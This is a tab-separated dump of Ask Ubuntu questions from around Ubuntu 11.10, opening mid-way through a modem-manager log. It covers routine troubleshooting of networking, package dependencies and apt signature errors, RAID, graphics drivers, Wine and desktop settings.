21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) serial port closed dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) opening serial port ... dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( generic ) : gsm modem /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4 claimed port rfcomm0 dec 28 21:28:21 falx kernel : [ 23928.827280 ] rfcomm_tty_ioctl : tiocgserial is not supported dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) closing serial port ... dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) serial port closed dec 28 21:28:21 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8/bluetooth ) stage 2 of 5 ( device configure ) modem found . dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) opening serial port ... dec 28 21:28:21 falx modem-manager [ 998 ] : < info > modem /org/freedesktop/modemmanager/modems/5 : state changed ( disabled - > enabling ) dec 28 21:28:21 falx kernel : [ 23929.158953 ] rfcomm_tty_ioctl : tiocgserial is not supported dec 28 21:28:22 falx modem-manager [ 998 ] : < info > modem /org/freedesktop/modemmanager/modems/5 : state changed ( enabling - > enabled ) dec 28 21:28:22 falx modem-manager [ 998 ] : < info > modem /org/freedesktop/modemmanager/modems/5 : state changed ( enabled - > registered ) dec 28 21:28:22 falx networkmanager [ 1031 ] : < warn > gsm connection failed : ( 32 ) unknown registration status response dec 28 21:28:22 falx networkmanager [ 1031 ] : < info > ( 94:20:53 : d9 : c8 : c8 ) : device state change : config - > failed ( reason 'unknown ' ) [ 50 120 1 ] dec 28 21:28:22 falx networkmanager [ 1031 ] : < info > marking connection 'vodafone predefinito ' invalid . dec 28 21:28:22 falx networkmanager [ 1031 ] : < warn > activation ( 94:20:53 : d9 : c8 : c8 ) failed . dec 28 21:28:22 falx networkmanager [ 1031 ] : < info > ( 94:20:53 : d9 : c8 : c8 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] dec 28 21:28:22 falx networkmanager [ 1031 ] : < info > ( 94:20:53 : d9 : c8 : c8 ) : deactivating device ( reason 'none ' ) [ 0 ] dec 28 21:28:22 falx networkmanager [ 1031 ] : nm_system_iface_flush_routes : assertion `ifindex > 0 ' failed dec 28 21:28:22 falx networkmanager [ 1031 ] : nm_system_iface_flush_addresses : assertion `ifindex > 0 ' failed dec 28 21:28:22 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) closing serial port ... dec 28 21:28:22 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) serial port closed dec 28 21:28:22 falx modem-manager [ 998 ] : < info > ( tty/rfcomm0 ) : released by modem /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4 dec 28 21:28:22 falx modem-manager [ 998 ] : < info > modem /org/freedesktop/modemmanager/modems/5 : state changed ( registered - > disabled ) dec 28 21:28:22 falx modem-manager [ 998 ] : mm_generic_gsm_update_signal_quality : assertion `self ! = null ' failed when the phone is restarted , the connection works . i had the same problem with other provider ( orange in austria ) , and had no problems with other phone with the same ( vodafone ) provider . i have found no c7 posts mentioning such problems , so i assume it works fine under windows . any hints ? ( i am running up-to-date ubuntu 11.10 )
91121	home directory copy from 1 machine to another	i want to change machine and take my home directory with me . i made a copy of a home directory from my usual machine with 10.04 and put it on an external h\d . i would like to know where to copy it onto the new machine ith 11.10 without damaging the current home directory and if possible have my bookmarks in my new machines firefox thanks
91127	how do i decrease the timeout on ifup ?	i 'm writing a shell script that brings up an ethernet interface ( configured for dhcp ) to determine whether it 's connected to a network . if it is n't , i 'd like to be able to report in a timely manner ( within a few seconds ) that there 's no connection . unfortunately , in the absence of a connection , ifup seems to wait several minutes before timing out , and the man page does n't mention a timeout parameter . is there any way to stop it after a few seconds ? this is on ubuntu server 11.10 ; networkmanager is not in use .
91129	unable to install emacs 24 from ppa : cassou/emacs	i followed the following instructions to install emacs 24 on my machine ( borrowed from : http : //www.mikeyboldt.com/2011/11/30/install-emacs-24-in-ubuntu/ ) : sudo add-apt-repository ppa : cassou/emacs sudo apt-get update sudo apt-get install emacs-snapshot but i get the following errors : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : emacs-snapshot : depends : libgnutls26 ( > = 2.12.6.1-0 ) but 2.10.5-1ubuntu3 is to be installed depends : libmagickcore4 ( > = 8:6.6.9.7 ) but it is not installable depends : libmagickwand4 ( > = 8:6.6.9.7 ) but it is not installable e : unable to correct problems , you have held broken packages .
91133	different wallpapers for each desktop in 11.10	i know this has already been discussed in different post , ( is it possible to have a different background for each workspace ? ) but the solutions were for 11.04 . i want to have a different wallpaper for each desktop . i have already installed compiz and the extra plugins to get the wallpaper plugin by : sudo apt-get install compizconfig-settings-manager compiz-fusion-plugins-extra then i select in the plugin 4 new wallpapers including a .jpg which prompts me to enable jpg plugin , which i do . next in advanced settings ( old ubuntu tweak tool ) i make the setting off for /desktop/have file manager handle the desktop the result is i have 4 desktops completely black . after playing around with multiple pictures , i managed to get my 4th desktop ( lower right ) to show a picture . the pictures were of different resolutions and then of the same resolution , so i am not sure why that particular one worked . by the way if i will manage to make this work , will i still be able to use my conky ? solutions i 've tried after suggestions and still did not work : new account created , made the settings = > only 2 pics are rendered : top right and lower left . tried ctrl+alt+f1 , then back to ctrl+alt+f7 , still nothing i confirm that .jpg and .png are enabled in compiz . thanks .
91136	is there a way to get the innotab learning lodge navigator software working ?	i bought my daughter an innotab for christmas , is there any way to get the learning lodge navigator working in wine since its not compatable with linux ? i mean i need to be able to plug her innotab into
91137	ubuntu 10.4 lts freezes all the time	did a parallel install of 10.4 lts today , used jaunty ( 9.04 ) until now . had no problems with the system , just out of date . the new installed system freezes every few minutes , even if i just start the system ( auto log on ) . i use the intel gma 950 onboard graphic . i heard of problems with some kernels with this chipsset , newer kernels should have this issue fixed - but i had a stable system using jaunty ... is there a solution other than stick to 9.04 ? tia
91138	tool for connecting to symbian s60 filesystems	i am searching for a tool ( or maybe there 's a workaround to get it accessed via default tools ? ) which would let me mount s60 ( symbian ) filesystems . so far i 've found p3nfs , although it seems a bit outdated for current ubuntu ( problems with some of gcc modules ) or am i doing something in a wrong manner ? thank you in advance
91139	is it possible to adjust the vertical size of the unity launcher ?	i want to make the bottom of the unity launcher stop a little higher , is this possible ? this is n't related to width or icon size . searching turned up nothing about this . this is on ubuntu 11.10 .
91143	what is the ppa 's openpgp id ?	i 'm creating a livecd from this guide and came across a line i do not understand : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 12345678 # substitute `` 12345678 '' with the ppa 's openpgp id . wondered if anyone can explain what should i substitue 12345678 with and how to obtain it
91151	how do i get a canon mp550 working with gutenprint ?	my printer canonmp550 does n't work with i7 x86 64bit under ubuntu 11.10 with cups+gutenprint2.5.7 . what i found , is : in gutenprint it is translated into ip4000 only , but it belongs to the group ip4700 , which is translated into ip4300 ( parameter ) . i tried to correct , read only , what to do ? next is gutenprint uses cups 1.2 , but installed is cups 1.5 , so instead system/library/ color sync/ ... .. it is usr/share/color/icc/srgb.icc . so this seem to be real bugs , but ii am new and need help to correct this staff !
91154	graphics lag on ubuntu 11.10 x64 with nvidia 9400 gt on admin user	ubuntu 11.10 x64 kernel 3.0.0-14-generic intel core 2 duo e7500 2.93 ghz 2 gb kingston ddr3 nvidia 9400 gt , driver 280.13 my admin account has a graphics problem . it glitches and fractures . but the strange thing , it only happen in my main account . in another account , the graphics performances is flawless . it happened after i 've run partial upgrade ( i do n't know why , it ask for partial upgrade even after i restarted my box ) and uninstalling keepassx . i 've made mistake when i uninstall keepassx . i 'm forgot to close the app . after i 've uninstalled keepassx , the app still running . i 've tried to close the app but it started to lack . my ubuntu performance started decreasing . then i restart my computer . after logon screen , the graphics started to lag . any help would be appreciated . edit : when using older kernel , it runs normal . is it kernel bug ?
91155	`` lost '' files in fat32 drive	i was a little sleepy and i formated a 256 gb usb pendrive with fat32 , copied some files and folders from a laptop with xubuntu ( ntfs ) and ... the folders and the files out of the folders were in the right place , no problem , but the files inside the folders `` disappeared '' ( i write disappeared in quotation marks because the disc space still occupy , what give me some hope ... ) any idea about how recovery those files ? cheers , ifrit
91167	un-raiding a two-disk fakeraid array	i have a system with two disks in a bios-configured raid-1 array , currently dual-booting win7 and ubuntu 10.10 . i opted for fakeraid , rather than softraid , so that the raided disk could be seen from both win7 ( gaming ) and ubuntu ( everything else ! ) . for various reasons , i 've decided to back out from running this system with a raided disk , so i would like two separate disks : one for the two os versions , and one for data . i removed the raid setting in bios , and rebooted . both oses boot ok , but i ca n't tell what 's happening with the disk config . when i list the mount table , i still the /dev/mapper entries that were familiar from fakeraid : $ sudo mount | grep /dev /dev/mapper/pdc_beidbcaig5 on / type ext4 ( rw , errors=remount-ro , commit=0 ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) /dev/dm-1 on /mnt/windows type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/mapper/pdc_beidbcaig9 on /home type ext4 ( rw , user_xattr , commit=0 ) /dev/mapper/pdc_beidbcaig6 on /var type ext4 ( rw , commit=0 ) /dev/mapper/pdc_beidbcaig7 on /boot type ext3 ( rw , commit=0 ) if i start gparted , i can see the partitions of the two mirrored disks , listed separately for /dev/sda and /dev/sdb . however , when i ask for information on any partition displayed in gparted , i get a warning : warning : no such file or directory while trying to open /dev/sda5 could n't find valid system superblock dumpe2fs 1.41.12 ( 17-may-2010 ) dumpe2fs : no such file or directory while trying to open /dev/sda5 unable to read the contents of this file system ! now clearly the file system can be read , because otherwise it would n't boot . but equally clearly something is awry in the disk configuration . sadly , i do n't really know where to start . i did read the man page for dmraid , and i thought that the -x option was what i needed . however : $ sudo dmraid -x about to delete raid set pdc_beidbcaig warning : the metadata stored on the raidset ( s ) will not be accessible after deletion do you want to continue ? [ y/n ] : y error : raid set deletion is not supported in `` pdc '' format in summary , what steps should i take to ensure that my two previously mirrored raid-1 disks become two separate independent drives , one of which i can reformat to store more data on ? thanks !
91170	creating custom updates for my users ?	i 'm looking for a secure and flexible way of pushing custom updates to my users ' ubuntu 11.10 x64 machines . i 'm looking to push updates that will run scripts for adding new software , adjusting settings , etc etc etc..basically any changes i 'd like to make to an ubuntu machine , only on all of my users ' systems . of course i 'd also like to control if/when these systems get the usual ubuntu updates . there 's lots of info out there on setting up repos for updating a particular app ; hoping someone could point me in the right direction for best methods of updating/reconfiguring ubuntu systems and applications overall . many thanks ! edit : already aware of landscape , and while very well suited for my needs it 's out of our ( non-existant ) budget .
91172	usb memory device not detected	it used to work fine , but then one day it just would not show up . i 've tried using all the usb ports . the memory stick works on other computers , and other usb devices work on this computer . anyone know what is up ? i am using ubuntu 11.10 .
91176	how to get office 2010 ( specifically outlook ) to run ?	although there are many alternatives out there , i 'm not prepared to get away from outlook yet , and i have many clients i 'd like to switch over to ubuntu but they need outlook and wo n't switch because of this one thing holding them back . currently i have ubuntu 11.10 , wine 1.3.35 and playonlinux 4.0.14 i tried to get wine 1.3.9 which apparently supports office 2010 but i ca n't get that to install either . not sure if it 's a waste of time , but that 's a separate question if it 's a path worth going down . office 2010 starts install with playonlinux no problem but half way through fails with the following error : 1 : 25541 2 : -2147024786 3 : c : \windows\microsoft.net\framework\v2.0.50727\config\machine.config i 'm thinking i have to install .net framework separately first but i do n't want to mindlessly install all kinds of software and makes things worse . i appreciate any advice on this so i can help promote this awesome operating system .
91177	how do i turn off wireless connection notifications ?	when a wireless connection is made , an indicator bubble pops up announcing the connection , and it hangs around for a little while . how do i turn that off ?
91178	how do i get a sony vaio vgn-cr120e webcam working ?	i have a sony vaio vgn-cr120e with ubuntu 11.10 . my webcam will not work with skype or cheese . it simply says `` no device found '' . can somebody please help me fix this ? thanks .
91179	i want to create the partitions in filesystem . is that possible ?	i have installed ubuntu 10.04 recently . i mean today ! and i want my filesystem ( 80gb ) to be divided into three part just like windows do ! is that possible ? if yes please help me !
91182	how to open a file with .3 extension ?	i have a very important file which in ubuntu says .3 extention . how to open it ? please help me ! file type says its .bin file ? according to me it should be either picture , pdf or doc !
91185	how do i auto run a program when i log into a specific console ?	i would like to automatically run a program when i log on to a specific console ( tty1 ) and no other . i am running ubuntu server 10.10 ( no x ) and i added the following line to my /etc/init/tty1.conf to automatically log me in to the first console and it works . exec /bin/login -f username < /dev/tty1 > /dev/tty1 2 > & 1 i have a program ( called homeauto ) that monitors a special data acquisition board and i want it to start when this console logs in . is it a matter of simply adding another line to that file too ?
91187	sharing internet connection via ethernet from wi-fi	i have a voip box with an ethernet port that needs to have an internet connection , and a laptop with wi-fi that can already go online . i need to somehow `` bridge '' ( do n't know if i used this term correctly ) these two interfaces together so my voip box works . i have already used the network manager in ubuntu 11.10 and set `` eth0 '' to `` share to other computers '' but the voip box is getting no internet at all . i tested the ethernet connection with my dad 's laptop and it proves that this `` share to other computers '' thing is garbage . i will accept any comments and answers , and i appreciate them as well .
91188	authentication token manipulation error	i forgot my ubuntu password so i booted into recovery and dropped into a root shell prompt and this is what happened : root @ username-pc : ~ # passwd username enter new unix password : retype new unix password : passwd : authentication token manipulation error passwd : password unchanged
91193	update manager unable to get updates	in last few days my ubuntu 11.10 update manager is unable to get new updates . when i checked update log i saw that for couple of updates it says `` network is n't available '' . for other updates it downloaded logs and and internet connection also works fine . unable to attached screenshot due to spam prevention policy . but for below release gpgv : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_oneiric_release.gpg it says `` network is n't available '' for all other releases it is downloading fine . and due to this i dont see any update available in last 10 days . log of sudo apt-get update : dipen @ eidlcpu1018 : ~ $ sudo apt-get update [ sudo ] password for dipen : ign http : /extras.ubuntu.com oneiric inrelease ign http : /archive.canonical.com oneiric inrelease ign http : /archive.canonical.com lucid inrelease get:1 http : /extras.ubuntu.com oneiric release.gpg [ 72 b ] get:2 http : /archive.canonical.com oneiric release.gpg [ 198 b ] hit http : /extras.ubuntu.com oneiric release get:3 http : /archive.canonical.com lucid release.gpg [ 198 b ] err http : /extras.ubuntu.com oneiric release hit http : /archive.canonical.com oneiric release ign http : /archive.canonical.com oneiric release hit http : /archive.canonical.com lucid release ign http : /archive.canonical.com lucid release ign http : /archive.canonical.com oneiric/partner i386 packages/diffindex ign http : /archive.canonical.com oneiric/partner translationindex ign http : /archive.canonical.com lucid/partner i386 packages/diffindex ign http : /archive.canonical.com lucid/partner translationindex hit http : /archive.canonical.com oneiric/partner i386 packages hit http : /archive.canonical.com lucid/partner i386 packages ign http : /dl.google.com stable inrelease ign http : /archive.canonical.com oneiric/partner translation-en_in ign http : /archive.canonical.com oneiric/partner translation-en ign http : /archive.canonical.com lucid/partner translation-en_in ign http : /archive.canonical.com lucid/partner translation-en ign http : /in.archive.ubuntu.com oneiric inrelease ign http : /in.archive.ubuntu.com oneiric-updates inrelease ign http : /in.archive.ubuntu.com oneiric-security inrelease get:4 http//dl.google.com stable release.gpg [ 198 b ] get:5 http//in.archive.ubuntu.com oneiric release.gpg [ 198 b ] get:6 http//in.archive.ubuntu.com oneiric-updates release.gpg [ 198 b ] get:7 http//in.archive.ubuntu.com oneiric-security release.gpg [ 198 b ] hit http : /in.archive.ubuntu.com oneiric release ign http : /in.archive.ubuntu.com oneiric release hit http : /in.archive.ubuntu.com oneiric-updates release err http : /in.archive.ubuntu.com oneiric-updates release hit http : /in.archive.ubuntu.com oneiric-security release ign http : /in.archive.ubuntu.com oneiric-security release ign http : /in.archive.ubuntu.com oneiric/main i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric/restricted i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric/universe i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric/multiverse i386 packages/diffindex hit http : /in.archive.ubuntu.com oneiric/main translationindex hit http : /in.archive.ubuntu.com oneiric/multiverse translationindex hit http : /in.archive.ubuntu.com oneiric/restricted translationindex hit http : /in.archive.ubuntu.com oneiric/universe translationindex ign http : /in.archive.ubuntu.com oneiric-security/main i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric-security/restricted i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric-security/universe i386 packages/diffindex ign http : /in.archive.ubuntu.com oneiric-security/multiverse i386 packages/diffindex hit http : /in.archive.ubuntu.com oneiric-security/main translationindex hit http : /in.archive.ubuntu.com oneiric-security/multiverse translationindex hit http : /in.archive.ubuntu.com oneiric-security/restricted translationindex hit http : /in.archive.ubuntu.com oneiric-security/universe translationindex hit http : /in.archive.ubuntu.com oneiric/main i386 packages hit http : /in.archive.ubuntu.com oneiric/restricted i386 packages hit http : /in.archive.ubuntu.com oneiric/universe i386 packages hit http : /in.archive.ubuntu.com oneiric/multiverse i386 packages hit http : /in.archive.ubuntu.com oneiric/main translation-en hit http : /in.archive.ubuntu.com oneiric/multiverse translation-en hit http : /in.archive.ubuntu.com oneiric/restricted translation-en hit http : /in.archive.ubuntu.com oneiric/universe translation-en hit http : /in.archive.ubuntu.com oneiric-security/main i386 packages hit http : /in.archive.ubuntu.com oneiric-security/restricted i386 packages hit http : /in.archive.ubuntu.com oneiric-security/universe i386 packages hit http : /in.archive.ubuntu.com oneiric-security/multiverse i386 packages hit http : /in.archive.ubuntu.com oneiric-security/main translation-en hit http : /in.archive.ubuntu.com oneiric-security/multiverse translation-en get:8 http//dl.google.com stable release [ 1,347 b ] hit http : /in.archive.ubuntu.com oneiric-security/restricted translation-en hit http : /in.archive.ubuntu.com oneiric-security/universe translation-en get:9 http//dl.google.com stable/main i386 packages [ 1,214 b ] ign http : /dl.google.com stable/main translationindex ign http : /dl.google.com stable/main translation-en_in ign http : /dl.google.com stable/main translation-en fetched 3,821 b in 41s ( 91 b/s ) reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : /extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : /archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : /archive.canonical.com lucid release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : /in.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : /in.archive.ubuntu.com oneiric-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : /in.archive.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : /extras.ubuntu.com/ubuntu/dists/oneiric/release w : failed to fetch http : /in.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release w : some index files failed to download . they have been ignored , or old ones used instead . dipen @ eidlcpu1018 : ~ $ log of sudo apt-get upgrade : dipen @ eidlcpu1018 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : ghc6-doc haskell-zlib-doc libghc6-zlib-doc 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . dipen @ eidlcpu1018 : ~ $ /etc/apt/sources.list : deb http : /in.archive.ubuntu.com/ubuntu/ oneiric main restricted deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb http : /in.archive.ubuntu.com/ubuntu/ oneiric universe deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb http : /in.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb http : /archive.canonical.com/ubuntu oneiric partner deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-security main restricted deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-security universe deb http : /in.archive.ubuntu.com/ubuntu/ oneiric-security multiverse deb http : /extras.ubuntu.com/ubuntu oneiric main # third party developers repository deb http : /archive.canonical.com/ lucid partner
91195	how do i adjust the screen contrast ?	i am using an acer aspire 3680 with intel gma 950 video running ubuntu 12 and i can not find the setting to adjust the screen contrast setting . too many colors and grays are washed out on the current setting . what command or graphical utility will do this ?
91198	acpi errors with an asus p8h67-m	i bought a motherboard asus p8h67-m rev 3.0 , and collected a configuration : motherboard : asus p8h67-m rev 3.0 . processor : intel core i7 2600k . video card : nvidia geforce gtx 470 . ram : 4096 mb . concerned about the issue associated with the work of this motherboard with linux . in the first all concerned work acpi in linux , namely there are errors in dmesg : 1 : [ 0.917871 ] acpi error ( psargs-0359 ) : [ ramb ] namespace lookup failure , ae_not_found . 2 : [ 0.917894 ] acpi exception : ae_not_found , could not execute arguments for [ ramw ] ( region ) ( 20090903/nsinit-338 ) . 3 : [ firmware bug ] : acpi : bios _osi ( linux ) query ignored . what to do ?
91201	connecting to bsnl wireless broadband	i am unable to connect to my bsnl broadband ( wireless ) from ubuntu11.10 .it attempts to connect but then shows `` wireless network disconnected '' . though it connects automatically when i plug in the jack in the wired mode . i can also connect to other wireless networks elsewhere ... the wireless connection works fine when i use windows 7 . please help .
91202	shotwell exif of generated jpegs from raw ( nef in this case )	i 've noticed that after you double click on a raw image ( nef for me ) in shotwell it produces a jpeg file . before double clicking if i looked at view > extended information ( exif ) it showed correctly , but after jpeg is generated , there is no exif data available , so one has to open the file browser and navigate to the original nef photo in order to look at the exif data . is there a way to program ( am i missing something ? ) shotwell to retrieve the exif from the nef files after the jpegs are generated ?
91204	does apt-get automatically check digital signatures ?	i am planning to run a production server on ubuntu lts 8.04 and i am concerned about security of the packages i am installing i want to make sure that packages that are downloaded by apt-get were not tampered with . how do i view the digital signatures associated with a package in ubuntu ? does apt-get install , apt-get update , apt-get upgrade automatically check digital signatures when downloading , installing packages or do i need to pass a command line option for these checks to happen ? who am i trusting when i install a package using apt-get install assuming that the package is part of the ubuntu main distribution , am i trusting canonical , debian , or an open source contributor ?
91205	can apt do everthing dpkg can ?	as i understand things apt uses dpkg are there any operations that you can do with dpkg that ca n't be done with apt ? as a new user to ubuntu server do i need to learn anything about dpkg ?
91206	ubuntu oneiric server ( amd64 ) failed to detect qemu harddisk ata and e1000 model nic	when i tried to clean install ubuntu 11.10 server ( amd64 ) as a hvm guest on xen ( 4.0.1 ) , it failed to detect qemu harddisk ata-7 hard disk and e1000 model nic provided by xen-qemu-dm . same thing is there with ubuntu 11.04 . further , when i did a release upgrade from ubuntu 10.10 server ( amd64 ) to ubuntu 11.10 server ( amd64 ) , ubuntu 11.10 boot sequence stops before loading real kernel saying that initramfs can not find the hard disk . alert ! /dev/disk/by-uuid/xxxxxx does not exist . in this case , cat /proc/modules does not show ide , ata or sata modules . that means there is a problem when generating initramfs for ubuntu 11.10 from ubuntu 10.10 . does someone know how to fix this ? ? ? ? ?
91207	samba : can not see shared folders	i 'm trying to connect my laptop to pc thorugh lan ( both are ubuntu ) because i need to grab some data there . the problem is when i browse network section in nautilus i can not see folder list that i already set on that desktop , but instead all i see is my own shares folder in this laptop . is it because my laptop and desktop shares the same name ' james ' or ? im looking forward for your answers and help ... thanks !
91208	unable to connect to internet ( wired connection )	i have been recently trying ubuntu 11.04 natty narwhal using a live cd . in spite of the user friendly gui interface , i am finding it useless when unable to connect to the internet.i have , i think , an adsl modem , with wires connecting it to the computer and a land-phone.every time i try to connect using auto-eth0 option the message-box appears after a while showing that it is unable to connect to the internet . i have no info regarding the vpn , as my isp does n't provid any.now , how do i connect it to the net ?
91212	thunderbird does not show calendar	i do not see calendar tab in thunderbird at all . i tried v8 and v10 beta but same issue . please help resolve . i have installed all addons as well , it was working for me when i was using tb 5 . click to open a full-resolution image .
91213	trouble installing gmp 5.0.2	i am new to linux and ubuntu ( 11.10 , oneiric ocelot ) , so if there is some type of installer that i can double-click , that would be great . otherwise , can you help me understand what 's happening here . after downloading gmp-5.0.2.tar.bz2 and extracting it to my documents folder , i followed these instructions , but i 'm hitting an error : louis @ x-pc : ~/documents/gmp-5.0.2 $ ./configure [ checking various things ... ] checking for suitable m4 ... configure : error : no usable m4 in $ path or /usr/5bin ( see config.log for reasons ) . louis @ x-pc : ~/documents/gmp-5.0.2 $ make make : *** no targets specified and no makefile found . stop . config.log is actually 180kb , and i really would n't know what to look for . can you tell me what i should do ?
91220	how can i run turbo c++ ?	how can i use windows apps like turbo c++ on ubuntu ? wine says `` not applicable on your pc '' , or something like that . i need to specifically use turbo c++ on ubuntu for my coursework .
91221	how to tell xubuntu not to clone but to expand the laptop display to the external one ?	i went to the settingsmanager and selected display . the external display was listed there . so i selected use this output ( see screenshot ) and after hitting apply the notebook screen was cloned to the external display . but what i wanted was for it to be expanded , not cloned . unfortunately i can not find any option for that . is there such an option ? greatful for any hints !
91226	are there power plans for ubuntu like in windows 7 ?	please people anyone if can help me . i 'm new to ubuntu , i mean have work with it since 11.04 come out . my only problem is battery life . in windows 7 i have balanced power saver and high performance is there anyway i can have these power plans on ubuntu 11.10 ? few weeks ago i saw someone post the same question and when i saw answers i found it but now i ca n't find it anywhere : ( please help me i really wan na stay to ubuntu but i 'm most of time travelling and battery life is so important for me .
91237	apache2 does n't give files away	what could it be a reason for such an error : if i go : http : //myhost/munin/ i get 403 error : forbidden . you do n't have permission to access /munin/ on this server . permissions for files are the following : max @ ubuntu : /var/www $ ls -l total 8 -rw-r -- r -- 1 www-data www-data 180 2011-12-28 16:06 index.html drwxr-xr-x 3 www-data www-data 4096 2011-12-28 08:55 munin additional : thank you very much for your help ! i did fix it by deleting the dir and targeting munin output html to another dir ( actually with the same permissions ) . i use that apache only for munin , so that strange behavior is ignored . i did try to access that my numin stats via dns name . all files in the same www dir were available , also all files in sub/sub/sub/dirs were also available . only ../munin dir was not working as i expected for some unidentified reason .
91241	removing software compiled and from source ?	i downloaded the source and compiled ruby 1.9.2dev but getting lots of issues when i try to run rails on this version , i want to start clean again is there simple way to remove all files installed by `` make install '' or do i need to find and remove all manual ?
91249	what problems should i expect with trying to dual boot ubuntu on an asus laptop x54h with windows 7 ?	i got the following computer over christmas , asus laptop / intel速 pentium速 processor / 15.6 '' display / 4gb memory model : x54h-bd3ma sku : 4005394 i 'm in the process of dual booting ubuntu on it , but would appreciate some sort of idea on what to expect or what to look forward to . what makes ubuntu more 'for beginners ' than other distros or what proliferates that myth ? edit : 10 key is not working . how do i fix that ?
91253	keyboard problem how to substitute a letter	hi an old but good laptop has a problem with the keyboard . the `` w '' key has stopped working . i have dismantled the key but it doesnt want to know . i am entering the w from a usb keyboard here.. as its only 1 key i thought to see if i can put the w on another key like the windows key or somewhere . any ideas and how to do it ? thanks
91254	gnome terminal icon licence , .xcf	i would like to use gnome terminal icon ( /usr/share/icons/humanity/apps/128/utilities-terminal.svg ) as a starting point to create new icon for my ubuntu app . is this a copyright issue ? can i find .xcf source file for this icon ?
91262	why ca n't i install programs from ubuntu center ?	i 'm and administrator and everything is all right but when i want to install something/click button with 'install ' written on it i ca n't . it 's disabled and i have no idea how to change that . please help ?
91263	how do i get to the gui after switching to a virtual console ?	i just jumped into a command line virtual console using ctrl-alt-f1 , and i would now like to return to the gui . startx gives me something along the lines of 'this server is already active for display 0 ' if ... etc . it gives me a command to remove /tmp/.x0lock if that is n't the case ... i could just restart the machine , but i 'm worried i might mess something up .
91264	help with 1080p on tv via laptop	update 1 : according to this and this , 1920x1080 should be possible : original question : according to lshw my laptop has : vga compatible controller product : 82852/855gm integrated graphics device vendor : intel corporation version : 02 width : 32 bits clock : 33mhz the laptop has a vga port allowing me to connect to my tv which also has a vga port , but i am only getting 1024x768 on the tv . how can i get 1920x1080 on the tv ? i have a 1080p tv .
91266	how to launch thunderbird when ubuntu 11.10 starts ?	i would like to configure thunderbird to starts when the session starts , but i do n't know how ! thx !
91267	acroread 's drop down menus are blank ? how can i fix this ?	i have adobe acrobat reader version 9.4.2 . all my drop down menus are blank . how can i fix this ? i can select menu items and stuff happens , but i have no idea what they are because there are no words or letters . i 'm using ubuntu 11.10 ( unity ) . i 've tried both ambiance and radiance themes but that did n't help at all .
91272	how to change font size in autocomplete dropbox	screenshot : i probably need to change something in theme gtkrc file , but i ca n't find what needs to be changed so that i reduce font size by one unit just for reference , i found similar question on so ( although it 's about ubuntu 11.10 ) : how to change the highlight color in autocomplete box in eclipse , which shows that even eclipse is using this from system setting , but to be more confusing font there is smaller ( like i want it to be )
91273	gdm does n't start and desktop looks weird after reinstalling gnome and the nvidia driver	so , there was a problem before with display so i reinstall gnome and nvidia graphic driver ; it seems like the gdm was n't reinstalled properly as ubuntu does n't start ; it holds at this moment : the gnome gui does n't load correctly as well . i started it like : startx from terminal ; the gui looks like this : as you may see from above image there 's no bar for menu and application ; how can i fix it ? info from xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 290.10 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) wed nov 16 20:32:22 pst 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` 